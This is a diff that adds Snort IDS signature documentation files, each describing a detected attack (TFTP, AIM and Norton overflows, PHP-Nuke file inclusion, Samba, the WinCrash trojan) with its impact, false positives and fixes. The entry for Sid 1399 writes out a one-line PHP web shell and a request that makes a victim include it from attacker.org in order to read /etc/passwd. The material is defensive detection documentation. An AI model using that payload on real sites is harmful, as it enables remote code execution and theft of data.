+Ease of Attack
+Simple: Numerous tools and automated scripts exist for scanning large
+subnets for improperly configured TFTP servers.
+
+--
+False Positives
+Legitimate TFTP GET requests for polling routers or other network
+devices may trigger this rule.  
+
+--
+False Negatives
+None known
+
+--
+Corrective Action
+The TFTP server should be configured to only allow GET requests from
+trusted locations.
+
+--
+Contributors
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski <Matt.Watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0183
+
+Arachnids:
+http://www.whitehats.com/info/IDS148
+
+Bugtraq:
+http://www.securityfocus.com/bid/9699
+
+--
--- /dev/null
+++ b/doc/signatures/715.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+715
+
+--
+Summary:
+This event is generated when a telnet server sends an error message regarding a failed user attempt to issue the 'su' command to get root privileges. 
+
+--
+Impact:
+Failed root access.  This attack occurs when a user attempts to get root privileges using the su command.
+
+--
+Detailed Information:
+An attacker may attempt to gain root privileges by issuing the su command.  This implies that the attacker has successfully connected to the telnet server with an account other than root. A failed attempt will cause an error message to be generated indicating that the user is not a member of an authorized group to obtain root privileges.
+
+--
+Affected Systems:
+All telnet servers.
+
+--
+Attack Scenarios:
+At attacker may attempt to gain root privileges on a telnet server.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+It is remotely possible that a legitimate user with multiple user accounts may attempt to issue su command from the wrong account.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use ssh instead of telnet to prevent su passwords from being sniffed.
+
+Tightly restric su access to authorized users.
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Original rule writer unknown
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1752.txt
@@ -0,0 +1,71 @@
+Nigel removed w00.w00 reference and added CVE, bugtraq
+
+Rule:
+
+--
+Sid:
+1752
+
+--
+Summary:
+This event is generated when exploit traffic is observed that attempts to cause a buffer overflow in a Windows host running America Online (AOL) Instant Messenger (AIM).
+
+--
+Impact:
+Attempted user level access.  A successful attack may permit the execution of arbitrary code with the privileges of the user running AIM.
+
+--
+Detailed Information:
+AIM can be used for message and file exchanges as well as many other applications.  A buffer overflow exists in AIM code that requests external applications (AddExternalAPP) that may permit the execution of arbitrary code on a Windows client AIM host with the privileges of the user running AIM.  
+
+--
+
+Affected Systems:
+Windows hosts running AIM 4.2 - 4.8.2616.
+
+--
+Attack Scenarios:
+An attacker may craft a malformed AIM add external application request causing a buffer overflow, and potentially permitting the execution of arbitrary code with the privileges of the user running AIM. 
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+This event is trigger when known exploit code is run.  It may be possible that other exploit code exists that will not trigger this event.
+
+--
+Corrective Action:
+
+ -Workstation:
+   Upgrade to version 2001B Beta v5.18 Build #3659 or later.
+
+    or
+
+   Go to Preferences in AIM -> Privacy ->
+   In "Who can contact me" check "Allow only users on my Buddy List".
+
+ -Network:
+   Block AIM traffic into and out of your network.  
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0362
+
+Bugtraq:
+http://www.securityfocus.com/bid/4677
+
+--
--- /dev/null
+++ b/doc/signatures/100000476.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000476
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "meaning.php" with SQL commands being passed as the "Action" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "Action" parameter in the "meaning.php" script used by 
+the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/163.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+163
+
+--
+Summary:
+This event is generated when Trojan Horse activity is detected from the program WinCrash.
+
+--
+Impact:
+Limited control of the targeted machine.
+
+--
+Detailed Information:
+The Trojan changes system registry settings to add the WinCrash server to programs normally started on boot. Due to the nature of this Trojan it is unlikely that the attacker's client IP address has been spoofed.
+
+The server portion opens TCP ports 5472 for version 1, and 2583 for version 2 to establish a connection between client and server.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is named server.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	WinManager
+
+Removal of this entry is required.
+
+Delete the file server.exe
+
+Edit the win.ini file to remove any references to the Trojan file.
+
+Ending the Trojan process is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS36
+
+Dark-e:
+http://www.dark-e.com/archive/trojans/wincrash/index.html
+
+--
--- /dev/null
+++ b/doc/signatures/2485.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2485
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow 
+associated with Norton Internet Security 2004 AntiSpam feature.
+
+--
+Impact:
+A successful attack may permit a buffer overflow that allows the
+execution of arbitrary code in the context of LOCAL_SYSTEM.
+
+--
+Detailed Information:
+Norton Internet Security 2004 provides desktop security for Windows hosts.
+A buffer overflow exists in a module associated with the AntiSpam feature of 
+Norton Internet Security. This is an ActiveX module that has been labeled
+"safe for scripting" allowing it to be accessed and run via a client's
+web browser on a host running a vulnerable version of Norton Internet
+Security 2004. If an attacker can entice a user on a vulnerable host to
+a malicious web server, it is possible to invoke the faulty ActiveX
+component.  This may cause a buffer overflow and the execution of arbitrary
+code in the context of LOCAL_SYSTEM.
+
+--
+Affected Systems:
+Norton Internet Security 2004, Norton Internet Security Pro 2004 versions before 7.0.3.8
+
+--
+Attack Scenarios:
+An attacker can entice a user on a vulnerable host to a malicious web
+page and execute the faulty ActiveX component, possibly causing
+a buffer overflow and the subsequent execution of arbitrary code on the
+vulnerable host.
+
+-- Ease of Attack:
+Difficult unless exploit code becomes available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://security.focus.com/bid/9916
+
+--
--- /dev/null
+++ b/doc/signatures/1399.txt
@@ -0,0 +1,81 @@
+Rule: 
+
+--
+Sid:
+1399
+
+--
+Summary:
+This event is generated when an attempt is made to include a remote file
+as part of PHP-Nuke index.php.
+
+--
+Impact:
+Possible information disclosure, or command execution at the priviledge level of
+the user running the webserver.
+
+--
+Detailed Information:
+The index.php included with PHP-nuke allows inclusion of additional files.
+Normal usage might be situations where a webmaster wants to include
+additional code in their index.php.  This can be done via
+"index.php?file=<path_to_file>".  PHP-nuke also allows inclusion of
+files from remote sources specified by either ftp or http as the
+transport protocol.  This allows attackers to craft their own php file
+(say, foo.php) and store it remotely (say, http://mysite.org/foo.php)
+and then instruct the victim machine to include foo.php as part of it's
+source.  Any code in foo.php will get executed on the victim machine.
+
+
+--
+Affected Systems:
+	PHP Nuke 1.0 through 5.3.1
+ 
+--
+Attack Scenarios:
+In an attempt to gain access to a remote site that happens to use PHP-nuke,
+an attacker crafts the following foo.php, and places it on a website that
+he controls:
+	
+	<?php
+	system($cmd);
+	?> 
+
+The attacker can then include foo.php as part of a remote site's index.php
+that uses PHP-nuke, and execute any command:
+
+	lynx \
+	http://victim.com/index.php?file=http://attacker.org/foo.php?cmd=cat%20/etc/passwd
+	
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+
+--
+False Negatives:
+If the page being accessed is not named index.php, but has the same
+vulnerability as the original index.php, the rule will not generate an
+event.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2975.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2975
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1586.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1586
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2498.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2498
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2539.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2539
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-CERT:
+http://www.us-cert.gov/cas/techalerts/TA04-104A.html
+
+--
--- /dev/null
+++ b/doc/signatures/2048.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2048
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the rsync daemon (rsyncd).
+
+--
+Impact:
+Serious. Possible theft of data.
+
+--
+Detailed Information:
+rsync is used to synchronize data between two machines across a network.
+It achieves this by only sending the differences between the files on 
+each host.
+
+Since it does not require both hosts to have the data it is 
+synchronizing, it is possible to retrieve a number of files from one 
+host without the corresponding files being present on the receiving 
+host.
+
+This event is generated when an attempt is made to cause a buffer
+overflow condition to occur in the rsync daemon.
+
+--
+Affected Systems:
+	All systems using rsync.
+
+--
+Attack Scenarios:
+The attacker needs to send specially crafted packet data to a host
+running rsyncd.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+Systems using rsync to coordinate sets of data between hosts not in the 
+same LAN.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Access to files via rsync should be carefully managed using access 
+control lists.
+
+The transfer of files from an internal source to an external one should 
+be carefully managed using the appropriate firewall rules.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+rsync Home:
+http://samba.anu.edu.au/rsync/
+
+--
--- /dev/null
+++ b/doc/signatures/939.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+939
+
+--
+
+Summary:
+This event is generated when an attempt is made to use a Frontpage 
+client to connect and/or publish content to a Frontpage Server 
+Extensions-enabled IIS web server. 
+
+--
+
+Impact:
+An attacker can modify your web content, access privileged files or 
+modify other users' privileges on the Frontpage-enabled virtual host.
+
+--
+
+Detailed Information:
+Microsoft Frontpage is a web-content managing and publishing 
+application, which also comes with server extensions for Microsoft IIS 
+and Apache web servers. The extensions enable the servers to display 
+dynamic content, as well as perform certain levels of web-server 
+administration.
+
+--
+
+Affected Systems:
+All systems running FPSE on IIS.
+
+--
+
+Attack Scenarios:
+An attacker can gain the FPSE username and password via sniffing, social
+engineering or brute force guessing. After successfully logging on to 
+the system, the attacker can alter web contents, modify login 
+information for other users and generally control the web server.
+
+--
+
+Ease of Attack:
+After gaining the login credentials the attack is trivial. 
+
+--
+
+False Positives:
+If FrontPage authoring is allowed from resources external to the 
+protected network this rule will generate an event.
+
+--
+
+False Negatives:
+not known.
+
+--
+
+Corrective Action:
+Disable FPSE if it is not needed for web-content management.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+
+Additional References:
+
+eEye Digital Security:
+http://www.eeye.com/html/research/advisories/AD20001222.html
+
+--
--- /dev/null
+++ b/doc/signatures/437.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+437
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Redirect for the Type of Service and Network datagram.
+
+--
+
+Impact:
+Redirect messages are normally an indication that a shorter route to a particular destination exists.  
+
+--
+
+Detailed Information:
+ICMP Redirect messages are generated by gateway devices when a shorter route to the destination exists.  When a gateway device receives an Internet datagram from a host on the same network a check is performed to determine the address of the next hop (gateway) in the route to the datagrams destination.  The datagram is then forward to the next hop on the route.  If this gateway device is also on the same network, the gateway device generates an ICMP Redirect message and sends it back to the host that originally generated the traffic.  The ICMP redirect message informs the original host that a shorter route exists and any additional traffic should be forwarded directly to the closer gateway device.
+
+--
+
+Attack Scenarios:
+Attackers on the local subnet could potentially use ICMP Redirect messages to force hosts to use compromised gateway devices.  
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+ICMP Redirect datagrams are legitimate Internet traffic if a shorter route to a destination actually exists.  
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 5 datagrams
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC792
+
+
+--
--- /dev/null
+++ b/doc/signatures/2466.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2466
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/620.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+620
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1542.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1542
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1558.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1558
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1915.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1915
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a format
+string vulnerability associated with the Remote Procedure Call (RPC)
+rpc.statd.
+
+--
+Impact:
+Remote root access. This may permit execution of arbitrary commands with
+the privileges of root.
+
+--
+Detailed Information:
+The rpc.statd daemon is a component of Network File System (NFS) that
+implements the Network Status and Monitor (NSM) RPC functions.  NSM
+monitors the status of NFS clients and servers and maintains a list of
+hosts that have registered to be notified when an NFS host crashes. 
+There is a format string vulnerability associated with the code that
+implements the monitoring of a given host, possibly permitting the
+execution of arbitrary commands with the privileges of root. 
+
+--
+Affected Systems:
+	Conectiva Linux 4.0, 4.1, 4.2, 5.0, 5.1
+	Debian Linux 2.2, 2.3
+	Red Hat Linux 6.0, 6.1, 6.2
+	SuSE Linux 6.3, 6.4, 7.0
+	Trustix Secure Linux 1.0, 1.1
+
+--
+Attack Scenarios:
+An attacker can attempt to exploit the format string error allowing
+execution of arbitrary commands with the privileges of root.  
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2915.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2915
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure switch_snapshot_master
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2341.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+--
+Sid:
+2341
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application DCP-Portal.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+DCP-Portal contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable root when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in a file included from an external source by modifying the
+variable "root" in the editor.php script.
+
+--
+Affected Systems:
+	DCP-Portal 5.0.1
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the root variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <matthew.watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000165.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+100000165
+
+-- 
+Summary: 
+This event is generated when an overly large UDP packet is sent to port 5093, 
+where the Sentinel License Manager service typically listens.
+
+--
+Impact:
+A denial of service will occur, and arbitrary code may be executed with the 
+privileges of the user running the service.
+
+--
+Detailed Information:
+A stack-based buffer overflow exists within the Sentinel License Manager, which 
+will be triggered if 2048 or more characters are received by the service. 
+Authentication is not required, and no specific characters need be present in 
+malicious packets in order to trigger the vulnerability.
+
+--
+Affected Systems:
+SafeNet Sentinel License Manager 7.2.0.2
+
+--
+Attack Scenarios:
+An attacker could use one of the publicly available exploit scripts, or create 
+a script which simply sends 2048 or more random characters to a vulnerable 
+server.
+
+--
+Ease of Attack:
+Simple, as public exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to version 8.0 or above.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+
+--
--- /dev/null
